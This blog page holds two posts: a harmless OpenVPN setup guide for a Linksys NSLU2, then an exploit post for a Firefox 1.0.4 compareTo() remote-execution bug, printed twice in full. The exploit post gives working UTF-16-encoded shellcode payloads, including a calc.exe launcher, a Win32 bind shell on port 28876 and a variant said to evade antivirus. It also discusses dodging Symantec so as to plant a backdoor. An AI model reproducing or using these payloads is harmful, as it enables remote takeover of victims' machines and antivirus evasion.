Well I finally picked up a NSLU2 by Linksys. Have to say I am pretty impressed so far. A little device that fits in my hand just replaced 2 of my boxes at home. One for my fileserver and one for my openvpn server. Maybe at a later date I will go about how to flash it with unslung. But it is pretty easy so this doc is just for me to remember how I set up my openvpn.
So first thing is first go buy the NSLU2 and download unslung and flash it.
http://www.nslu2-linux.org/
Now you have it flashed. I put on a few packages first to allow me to work with it a bit better.
OpenSSH
Vim
Bash
Grep
Ok Now we are ready.
SSH to your NSLU2. If you have not set your password yet the default password is "uNSLUng"
Install OpenVPN:
ipkg update;ipkg -force-depends install openvpn
Create Tun:
mkdir /dev/net
mknod /dev/net/tun c 10 200
Install Tun:
insmod tun
Enable Routing:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now its time to generate our certs. I just downloaded openvpn on to my machine to create them. Goes much faster this way
You can download the current openvpn version here.
http://openvpn.net/
Also more details on this process can be found here.
http://openvpn.net/howto.html#pki
CD into the easy-rsa directory and edit the vars file with your information.
. ./vars
./clean-all
./build-ca
Now that the CA is up, we can build the keys for the server.
./build-key-server server
Now we have to build our client certs. I will only be buildling it for one client. I also use password protected certs.
./build-key-pass client1
Note: If you wanted other clients repeat the step with client2(or whatever you like). Remember to always use a unique common name for each client.
Generate Diffie Hellman parameters.
./build-dh
Now we need to create a direcotry on the NSLU2 to copy our keys to.
mkdir -p /opt/etc/openvpn/keys
You can copy these files to the NSLU2, may be a bit different for you:
ca.crt, ca.key, dh1024.pem, server.crt, server.key, 01.pem, 02.pem, 03.pem, and 04.pem
Now lets create a server.conf on the NSLU2 and write our conf file.
You can get a sample conf file from the previous download. I will just touch on the main things I change below.
I use TCP so I can proxy:
# TCP or UDP server?
proto tcp
;proto udp
Choose a cipher of your choice. Must be the same on the client.
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES
Make sure it switches to priv nobody.
# You can uncomment this out on
# non-Windows systems.
user nobody
group nobody
Thats pretty much it for the server side.
For the client side. Its pretty much straight forward.Just make sure you have the right certs.
ca.crt
client1.crt
client1.key
Now back to the NSLU2.
For a while I have been trying to get MASQUERADE in iptables to work. But since the module is not in the ipkg repository and it is not enbaled in the kernel, this was not working. If you view the comment below Cooper did get this working and wrote a how-to for this. Since he wanted MASQUERADE for something a bit different I will document how I did it. I wanted it so I can hit other boxes behind the VPN. Without having to creat SSH tunnels (Which is what I was doing).
Here is Cooper's doc on the NSLU site.
http://www.nslu2-linux.org/wiki/HowTo/EnableIPMasquerading
Now, for what I did for MASQUERADE.
First, I install the MASQUERADE modules, I used pre-compiled ones since I'm lazy. You can compile them yourself if you like, Cooper's doc shows you how. Below is a link to pre-compiled ones.
http://www.defector.de/docs/nslu2-ipmasq.htm
Now you can install these.
ipkg-cl install kernel-module-ipt-masquerade_2.4.22.l2.3r63-r7_nslu2.ipk
ipkg-cl install kernel-module-ipt-state_2.4.22.l2.3r63-r7_nslu2.ipk
Now lets install the modules.
insmod ip_tables
insmod iptable_filter
insmod ip_conntrack
insmod iptable_nat
insmod ipt_state
insmod ipt_MASQUERADE
If some modules cannot be found, I may have forgot to document these when I was messing around with different modules.
You can easily find and install them. I actually don't think you even need ipt_state or iptable_filter but I put them in there anyways to have a more full blown iptables.(in case of future work)
example:
ipkg list |grep conntrack
Now lets get all this stuff to run on reboot.
Create /opt/etc/init.d/S24openvpn and make it +x.
###################################################
#!/bin/sh
if [ -n "`pidof openvpn`" ]; then
/bin/killall openvpn 2>/dev/null
fi
# load kernel modules
/sbin/insmod tun
/sbin/insmod ip_tables
/sbin/insmod iptable_filter
/sbin/insmod ip_conntrack
/sbin/insmod iptable_nat
/sbin/insmod ipt_state
/sbin/insmod ipt_MASQUERADE
# enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# set iptables rule
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o ixp0 -j MASQUERADE
# Startup VPN tunnel in daemon mode
/opt/sbin/openvpn --cd /opt/etc/openvpn --daemon \
--log-append /var/log/openvpn.log \
--config server.conf
###################################################
Now you are all set! Test it out !
Thanks to everyone!
Sunday, December 18, 2005
Thursday, December 15, 2005
Fun w/ FireFox compareTo() Remote Execution
I love firefox, but just could not resist this.
A vulnerbility was found in Mozilla Firefox <= 1.04 when using the
compareTo() function.
http://www.milw0rm.com/id.php?id=1369
You can find older versions of FireFox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/
The exploit payload contained a return(Just would close the browser).
And what fun is that?
// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");
So I thought lets actually execute some abritrary code.
The thing that makes it hard is we cannot just use normal shellcode. We
have to convert it to UTF-16 so the browser can execute it. I suppose
UTF-8 would work also.
For Example:
\x29 would be %u785c%u3932
So here we go, create the shellcode and encode it to UTF-16.
How about something simple like calc.exe.
I found a shellcode encoder. I have had mixed results but you can find it here.
http://www.milw0rm.com/id.php?id=656
// Payload - Calc.exe
var payLoadCode=unescape(
"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7"+
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
Loaded the page, firefox shutdown and calc.exe poped-up. We can execute!
(tested on WinXP SP2)
While calc.exe was funny not to useful.
Lets bind a port so we can get a shell.
I tried creating different shellcode, things such as adding a user,port
binding, cmd exec, and reverse shells, In both Linux and Windows. The
shellcode was very touchy and had mixed results after encoding to
UTF-16.
This win32 bind shell code did work on WinXP SP2 from SkyLined.
// Payload - Win32 bindshell (port 28876) - SkyLined
var payLoadCode=unescape("%u4343%u4343%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
Opened the page in FireFox and telneted to port 28876
Although, Symantec did see it as being a Trojan about one minute later.
I will look into changing the shellcode a bit in hope of not triggering Symantec.
Otherwise you would only have one minute after exploit to plant a backdoor.
The exploit uses a method called spraying the stack. Its actually a
pretty cool method by SkyLined to find a predictable address.
I will continue to work on this when time permits, If anyone is
interesed I would like to see other UTF-16 encoded shellcode that
works.
Here is a UTF-16 Payload by SkyLined that is not suppose to set off virus scanners.
I have not tested this one yet.
payLoadCode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");
Below are some links to more info.
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php
A vulnerbility was found in Mozilla Firefox <= 1.04 when using the
compareTo() function.
http://www.milw0rm.com/id.php?id=1369
You can find older versions of FireFox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/
The exploit payload contained a return(Just would close the browser).
And what fun is that?
// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");
So I thought lets actually execute some abritrary code.
The thing that makes it hard is we cannot just use normal shellcode. We
have to convert it to UTF-16 so the browser can execute it. I suppose
UTF-8 would work also.
For Example:
\x29 would be %u785c%u3932
So here we go, create the shellcode and encode it to UTF-16.
How about something simple like calc.exe.
I found a shellcode encoder. I have had mixed results but you can find it here.
http://www.milw0rm.com/id.php?id=656
// Payload - Calc.exe
var payLoadCode=unescape(
"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7"+
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
Loaded the page, firefox shutdown and calc.exe poped-up. We can execute!
(tested on WinXP SP2)
While calc.exe was funny not to useful.
Lets bind a port so we can get a shell.
I tried creating different shellcode, things such as adding a user,port
binding, cmd exec, and reverse shells, In both Linux and Windows. The
shellcode was very touchy and had mixed results after encoding to
UTF-16.
This win32 bind shell code did work on WinXP SP2 from SkyLined.
// Payload - Win32 bindshell (port 28876) - SkyLined
var payLoadCode=unescape("%u4343%u4343%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
Opened the page in FireFox and telneted to port 28876
Although, Symantec did see it as being a Trojan about one minute later.
I will look into changing the shellcode a bit in hope of not triggering Symantec.
Otherwise you would only have one minute after exploit to plant a backdoor.
The exploit uses a method called spraying the stack. Its actually a
pretty cool method by SkyLined to find a predictable address.
I will continue to work on this when time permits, If anyone is
interesed I would like to see other UTF-16 encoded shellcode that
works.
Here is a UTF-16 Payload by SkyLined that is not suppose to set off virus scanners.
I have not tested this one yet.
payLoadCode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");
Below are some links to more info.
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php
Subscribe to:
Posts (Atom)
Posts
